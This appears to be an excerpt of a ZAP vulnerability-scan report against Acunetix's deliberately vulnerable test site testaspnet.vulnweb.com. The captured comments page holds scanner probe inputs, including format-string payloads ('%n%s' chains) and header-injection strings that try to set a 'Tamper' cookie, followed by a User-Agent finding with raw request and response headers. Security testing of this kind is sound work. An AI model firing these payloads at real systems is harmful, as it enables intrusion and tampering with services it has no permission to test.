AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:09 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:09 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:10 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:10 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP %1!s%2!s%3!s%4!s%5!s%6!s%7!s%8!s%9!s%10!s%11!s%12!s%13!s%14!s%15!s%16!s%17!s%18!s%19!s%20!s%21!n%22!n%23!n%24!n%25!n%26!n%27!n%28!n%29!n%30!n%31!n%32!n%33!n%34!n%35!n%36!n%37!n%38!n%39!n%40!n </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:34 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:06 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">\|</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:22 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Show / hide Request and Response
Request Header - size: 474 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:22 GMT Content-Length: 55888
Response Body - size: 55,888 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 